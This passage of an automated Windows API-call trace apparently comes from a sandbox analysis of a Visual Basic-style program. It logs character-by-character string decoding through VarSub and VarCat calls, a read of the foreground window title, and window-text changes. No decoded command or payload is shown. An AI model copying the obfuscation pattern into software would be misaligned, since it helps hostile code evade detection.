uIDEvent=0x103bc) returned 1 [0178.288] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="€", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x80\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0178.288] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0178.288] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="s", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="s") returned 1 [0178.288] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0178.289] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="u", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="u\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0178.289] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0178.289] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="h", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="h") returned 1 [0178.289] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0178.290] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="‚", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x82\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0178.290] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0178.290] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="u", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="u") returned 1 [0178.290] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0178.291] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x81", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x81\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0178.291] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0178.291] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0178.291] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0178.292] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="q", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="q\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0178.292] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0178.292] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="d", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="d") returned 1 [0178.292] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0178.296] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="|", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="|\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0178.297] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0178.297] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="o", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="o") returned 1 [0178.297] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0178.297] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="„", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x84\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0178.298] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0178.298] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="w", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="w") returned 1 [0178.298] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0178.298] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="{", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0178.299] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0178.299] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="n", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="n") returned 1 [0178.299] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0178.299] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0178.299] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0178.300] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0178.300] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0178.300] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0178.300] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0178.301] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0178.301] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0178.301] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="y", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="y\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0178.301] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0178.301] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="l", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="l") returned 1 [0178.302] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0178.302] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0178.302] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0178.302] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0178.303] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0178.303] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0178.303] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0178.303] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0178.304] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0178.304] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="s", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="s\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0178.304] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0178.304] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="f", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="f") returned 1 [0178.305] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0178.305] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0178.305] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0178.305] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0178.305] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0178.306] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0178.306] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0178.306] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0178.306] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0178.307] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x81", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x81\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0178.307] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0178.307] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0178.307] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0178.308] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0178.308] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0178.312] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0178.312] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0178.312] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0178.313] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0178.313] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="0", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="0") returned 1 [0178.313] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0178.313] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0178.314] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0178.314] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="0", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="0") returned 1 [0178.314] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0178.314] GetForegroundWindow () returned 0x102c2 [0178.314] GetLastError () returned 0x0 [0178.314] SysStringLen (param_1=" ") returned 0xff [0178.314] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=" ", cchWideChar=255, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 255 [0178.315] SysStringLen (param_1=" ") returned 0xff [0178.315] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=" ", cchWideChar=256, lpMultiByteStr=0x11644c4, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" ", lpUsedDefaultChar=0x0) returned 256 [0178.315] GetWindowTextA (in: hWnd=0x102c2, lpString=0x11644c4, nMaxCount=255 | out: lpString="Activity Arrive Event") returned 21 [0178.315] GetLastError () returned 0x0 [0178.315] SysStringByteLen (bstr="捁楴楶祴䄠牲癩⁥癅湥t†††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††† ") returned 0xff [0178.315] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Activity Arrive Event", cbMultiByte=255, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 255 [0178.315] SysStringByteLen (bstr="捁楴楶祴䄠牲癩⁥癅湥t†††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††† ") returned 0xff [0178.315] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Activity Arrive Event", cbMultiByte=256, lpWideCharStr=0x114bcc4, cchWideChar=511 | out: lpWideCharStr="Activity Arrive Event") returned 256 [0178.316] SysStringLen (param_1="Ac") returned 0x2 [0178.316] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Ac", cchWideChar=3, lpMultiByteStr=0x116863c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Ac", lpUsedDefaultChar=0x0) returned 3 [0178.316] SetWindowTextA (hWnd=0x103c4, lpString="Ac") returned 1 [0178.316] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x2 [0178.316] GetFocus () returned 0x0 [0178.316] lstrlenA (lpString="Ac") returned 2 [0178.316] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x0, Size=0x3) returned 0x10ebcd0 [0178.317] GetWindowTextA (in: hWnd=0x103c4, lpString=0x10ebcd0, nMaxCount=3 | out: lpString="Ac") returned 2 [0178.317] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xd, wParam=0x3, lParam=0x10ebcd0) returned 0x2 [0178.317] GetFocus () returned 0x0 [0178.317] lstrcmpA (lpString1="Ac", lpString2="Ac") returned 0 [0178.317] HeapFree (in: hHeap=0x10d0000, dwFlags=0x0, lpMem=0x10ebcd0 | out: hHeap=0x10d0000) returned 1 [0178.317] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x2 [0178.318] GetFocus () returned 0x0 [0178.318] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x0, Size=0x3) returned 0x10ebcd0 [0178.318] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xd, wParam=0x3, lParam=0x10ebcd0) returned 0x2 [0178.318] GetFocus () returned 0x0 [0178.318] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Ac", cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 3 [0178.318] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Ac", cbMultiByte=-1, lpWideCharStr=0x116863c, cchWideChar=3 | out: lpWideCharStr="Ac") returned 3 [0178.318] HeapFree (in: hHeap=0x10d0000, dwFlags=0x0, lpMem=0x10ebcd0 | out: hHeap=0x10d0000) returned 1 [0178.318] VarBstrCmp (bstrLeft="Ac", bstrRight="S ", lcid=0x0, dwFlags=0x30001) returned 0x0 [0178.319] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="d", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="d\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0178.319] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.320] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="W", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="W") returned 1 [0178.320] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.320] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="v", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="v\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0178.320] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.320] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="i", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="i") returned 1 [0178.320] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.321] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="{", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0178.321] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.321] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="n", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="n") returned 1 [0178.321] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.322] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="q", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="q\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0178.322] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.322] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="d", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="d") returned 1 [0178.322] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.323] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="|", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="|\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0178.323] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.323] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="o", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="o") returned 1 [0178.323] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.323] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="„", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x84\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0178.338] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.338] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="w", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="w") returned 1 [0178.338] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.339] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="€", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x80\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0178.339] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.411] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="s", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="s") returned 1 [0178.411] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.411] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0178.412] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.412] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0178.412] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.412] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="a", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="a\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0178.413] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.413] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="T", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="T") returned 1 [0178.413] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.414] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="n", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="n\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0178.414] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.414] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="a", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="a") returned 1 [0178.414] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.415] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="€", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x80\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0178.415] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0178.415] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="s", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="s") 